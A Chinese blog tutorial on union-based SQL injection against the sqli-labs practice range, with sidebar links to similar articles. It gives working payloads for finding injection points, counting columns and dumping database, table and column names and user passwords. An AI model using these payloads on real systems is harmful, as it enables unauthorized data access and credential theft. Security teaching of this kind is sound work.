sql注入之联合详解

于 2024-07-11 00:29:01 发布
阅读量1.3k 收藏 18
点赞数 29
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80679350/article/details/140335329
版权

一.sql注入漏洞

  SQL 注入是一种常见的网络安全攻击方式,黑客利用它来篡改应用程序后台数据库的 SQL 查询,以实现非法目的。攻击者通过向应用程序的输入字段中插入恶意 SQL 代码,来执行未经授权的数据库操作。

二.sql注入原理

  sql注入的本质其实就是打破原本传递数据区域的边界,插入逻辑代码。而这也正是他最致命的危害,最初的网站设计者都是直接将用户提交的参数拼接进入sql语句,这种拼接使得攻击者可以提交参数进行注入。

我们看一个sql语句:

select * from users where id=1

这里的id是可控的,我们可以让id为1 and 1=1 1 and 1=2,对于前者来说,真and真=真,页面会返回与id=1时一样的结果,而后者则因为1=2为假,所以页面返回不一样。由此便可判断可能有注入点,进而可以进行下一步攻击。

三.sql注入相关知识点

4.1

在MYSQL 5.0版本以后,MYSQL默认存在一个“information_schema”的数据库,在该库中,只需要记住三个表名SCHEMATA,TABLES,COLUMNS。

SCHEMATA中存放着所有数据库的库名,记录库名的字段名为schema_name

TABLES中存放着用户创建的所有数据库的库名,表名,记录的字段为table_schema和table_name

COLUMNS中存放着用户创建的数据库的库名,表名,字段名,记录其的字段为table_schema,table_name,column_name

4.2

limit函数使用的格式为:

limit m,n

其中m表示开始的位置,n表示读取的记录。例如limit 0,1 ,表示从第一条开始,读取一条。

4.3

在sql中常见的注释符有 #,--+。 

4.4

union select 是合并两个或多个表查询的结果集,如果我们将前面的表设为不存在的表,那么查询结果就返回了我们的目标表格的内容。可以设为-1等。

4.5

group_concat()函数是一种聚拢函数,通常可以将多个列的数据合并为一行。

四.联合查询注入检测方法和攻击方法

 基本流程

1.判断是否存在注入点

2.判断漏洞类型

3.判断字段数以及回显点

4.爆库名,表名,字段名以及数据

我们以sqli-labs靶场为例来说明

(1)首先我们要判断是否存在注入点,最常用的方法是输入

?id=1'

?id=1

一式无论是字符型还是数字型,都会因为单个引号的存在而报错。如果是二式的话,只是在字符型时会报错。

还可以运用逻辑表达式

?id=1' and 1=1--+

?id=1' and 1=2--+ 

当为数字型时一定会报错,因为有单引号的存在。而当为字符型时,由于--+将引号注释了,所以在1处闭合了。我们看本题源码分析

 

 当id=1‘ and 1=1--+时就变为了

$sql='SELECT * FROM USERS WHERE id='1'and 1=1--+'

真and真结果为真,页面返回正确,而当输入1=2时,页面就返回了错误,表明存在注入点,并且为字符型。

(2)判断列数的原因:union前面查询语句查询的元素需要和后面拼接的查询语句查询元素数量一致,否则会报错。

 判断列数我们可以使用

union select 1,2,3,.......

由“1”,“1,2”,“1,2,3”依次查询至正确为止。但这种方法相对费力,还有另外一种方法

order by n 

 

可以看出当查询字段数为三时页面返回正常,四时报错了,说明字段数是3。

(3)为什么要找到回显位呢?因为SQL注入的回显点,会有返回的响应结果(回显)。我们输入

?id=-1' union select 1,2,3--+

 

可以看出回显位是2,3

(4)接下来是最重要的步骤——爆库名表名列名以及信息

~爆库名

我们可以利用database函数返回 ,只要在回显位都可以

?id=-1' union select 1,2,database()--+

 

我选择的回显位是3,所以在3的位置出现了数据可得名称“security”。

~爆表名

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

 

~爆列名

在找到数据库的表名后 ,我们选则带有敏感信息的表进行查询,例如本题中的users

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+

 

~爆信息

?id=-1' union select 1,2,group_concat(username,password) from security.users--+

 对于联合查询注入来说,无论是字符型还是数字型,构造的payload基本都是这样的。但数字型不用构造单引号闭合,故而最后不使用注释符--+

接着我们模仿第一关过一遍第二关

首先,我们判断是否存在注入点

 

当我们输入id=1时不报错,id=1’时,报错。说明存在注入点并且为数字型

接着我们判断列数

判断出列数是三

然后判断回显位

 

 之后仍按照上面构造的payload爆出数据库名,表名,列名,以及信息

xiaohu爱冰拳
关注
  • 29
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SQL注入漏洞技术详解(技能点总结)
做自己喜欢的事,并将其发挥到极致!
05-10 945
文章目录一、SQL注入原理二、SQL注入攻击层面三、SQL注入的分类四、易出现SQL注入的功能点五、判断是否存在SQL注入六、SQL注入类型介绍布尔型盲注报错注入延时盲注(时间盲注)堆叠注入(多语句注入)内联注入联合查询注入(union)文件读写(利用union注入)盲注读取文件SQL注入GetShellOutfile和dumpfile的区别:宽字节注入宽字节注入修复二次注入User-Agent请求头注入(如XFF头注入等都可以使用同种方法测试)Cookie注入DNS注入Mysql查询数据库版本常见的万能密
sql注入详解
m0_73109590的博客
08-03 1003
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。...
SQL联合查询注入学习
最新发布
2301_80034711的博客
03-10 1129
SQL是操作数据库数据的结构化查询语句,网页的应用数据和后台数据库中的数据进行交互时会采用SQL。程序没有对用户输入数据的合法性进行验证和过滤,导致SQL查询语句被恶意拼接从而产生SQL注入。攻击者可以在事先定义好的查询语句的结尾上添加额外的SQL语句,从而对数据库服务器执行非授权的任意查询,获得相应的数据信息。4、分类:①GET注入注入点在URL中②POST注入注入点在POST提交的数据中③Head头注入注入点在请求头中①有回显注入(显错注入):执行语句后可以把具体内容反馈出来。
SQL联合注入
黑黑的小鸭的博客
08-09 2231
超详细介绍SQL联合注入,本文使用靶场为sqli-labs less-1;
SQL注入联合注入
weixin_52281518的博客
02-03 3140
SQL注入定义 SQL是操作数据库数据的结构化查询语言,网页的应用数据和后台数据库中的数据进行交互时会采用SQLSQL注入是指将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。当Web应用程序的开发人员对用户所输入的数据不进行过滤或验证(即存在注入点)就直接传输给数据库,就可能导致拼接的SQL被执行,获取数据库的信息以及提权,此时称发生了SQL注入攻击。 数据库基本操作: SQL WHERE语句:select *fr
sql注入中的联合注入
..
12-06 6238
联合注入 联合注入顾名思义,就是使用联合查询进行注入的一种方式,是一种高效的注入的方式,适用于有回显同时数据库软件版本是5.0以上的MYSQL数据库。至于为什么需要版本是5.0以上的MYSQL数据库是因为MYSQL会有一个系统数据库information_schema,能很快的通过几条注入语句获取到想要的数据。 UNION语法 mysql中,union用于将多个select语句的结果组合到一个结果集中,并删除结果集中的重复数据。 语法为: select column,...from tabl.
SQL注入联合注入
qq_60463414的博客
07-28 358
sql注入笔记 union手工注入
sql  联合查询
IT的专栏
04-14 2639
概述:   联合查询效率较高,举例子来说明联合查询:内联inner join 、左联left outer join 、右联right outer join 、全联full outer join 的好处及用法。   联合查询效率较高,以下例子来说明联合查询(内联、左联、右联、全联)的好处: T1表结构 (用户名,密码) userid (int)
SQL注入详解(扫盲篇)
09-09
SQL注入是一种常见的网络安全威胁,它发生在web应用程序中,由于开发者未能正确过滤或验证用户输入的数据,使得攻击者能够向数据库提交恶意的SQL语句。在本文中,我们将深入理解SQL注入的基本概念、工作原理以及常见...
一篇学会SQL注入 | 详解SQL注入(基础向,基础到每个参数)
weixin_47075747的博客
06-14 1165
**括号里面的查询被称之为子查询,在执行顺序中子查询先执行,然后再执行外面的 select **2) 的值是确定性的,假随机。
sql注入-联合注入
tlucky的博客
04-10 726
1.第一关 (1)根据提示输入id (2)求闭合字符 使用单引号出现报错,说明闭合字符为单引号 (3)求字段数 为3时显示正常 ,字段数为3 (4)求回显字段 回显字段为2,3 (5)爆数据库名 (6)爆表名 (5)爆列名 (8)爆字段名 2. 第二关 (1)求闭合字符 可判断为数值型注入 (2)确定字段数 字段数为3 (3)确定回显数 回显位为2,3 (4)爆数据库名 (5)爆表名 (6)爆列名 (7)爆字段名 3. 第三关 (1)求注入类型 加)试一下,
1.SQL联合注入
山兔的博客
07-31 235
安全的本质就是开发,又要懂安全又要懂开发,学安全就是开发的一些漏洞,两者相辅相成 一、SQL注入 原理:由于WEB应用程序对用户输入的数据合法性判断不严格导致。 攻击者利用现有应用程序,将恶意的SQL命令注入到程序后台并在数据库引擎执行的能力。 攻击者把SQL命令语句作为输入被服务器SQL解释器正确解析执行,数据库把查询到的结果返回给服务器,然后呈现给攻击者,攻击者由此获得数据库内的数据信息。 1.恶意请求 攻击者在正常查询请求后附加SQL语句请求至服务器(test.php?id=1 and 1=1),WE
SQL注入联合查询注入
qq_45691294的博客
07-11 7633
MySQL中的联合查询 联合查询是可合并多个相似的选择查询的结果集。等同于将一个表追加到另一个表,从而实现将两个表的查询组合在一起,使用为此为UNINO或UNION ALL 联合查询:将多个查询的结果合并到一起(纵向合并):字段数不变,多个查询的记录数合并 基本语法: select 语句 union[union选项] select 语句; 联合查询注入的条件 联合查询注入是MySQL注入中的一种方式,在SQL注入中说了注入漏洞存在的相关条件,而联合查询注入这种方法需要满足查询的信息在前端有回显,回显数据的
SQL注入之路之一:联合注入
weixin_62715196的博客
08-10 707
简单介绍union联合注入的原理、常用数据库名,以及一次简单的手工联合注入流程
SQL使用(一)-----联合查询
热门推荐
u012999796的专栏
03-15 10万+
本文主要对内连接(inner Join 或 Join)、外连接(outer Join) 、左外连接(left outer Join 或 left Join)、右外连接(right outer Join 或 right Join)、全外连接(full outer Join 或 full Join)、交叉连接 (cross Join)、结果集链接 (union 和 union all)等SQL联合查询进行了分析与介绍。
SQL注入——联合注入
初见辉少
07-12 1002
SQL注入原理:攻击者通过构造不同的SQL语句来实现对数据库的操作 SQL注入的本质:我们也能操作别人的数据库 数据库结构:库:就是一堆表组成的数据集合 表:类似Excel,有行和列组成的二维表 字段:表中的列称为字段 记录:表中的行称为记录 单元格:行和列相交的地方成为单元格 在数据库里有一个系统库:information_schema 在他里面有个存放所有库名的表:schemata schema_name 库名 ...
SQL注入---联合注入
qq_41592307的博客
09-03 253
Union联合注入攻击 1、联合注入的思路(会显示输出内容时,才考虑使用Union注入) (可以在输入框中或者URL中输入内容,如果不能在输入框内输入内容,则需要使用Burp suite使用 重发器,修改id中的内容进行爆破数据) 判断是否存在SQL注入点(判断注入的类型) 使用 order by 1-99 语句来检测数据表的字段数量 1.字符型 2.整数型 判断输出的位置,通过联合查询,union select 字段数 ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值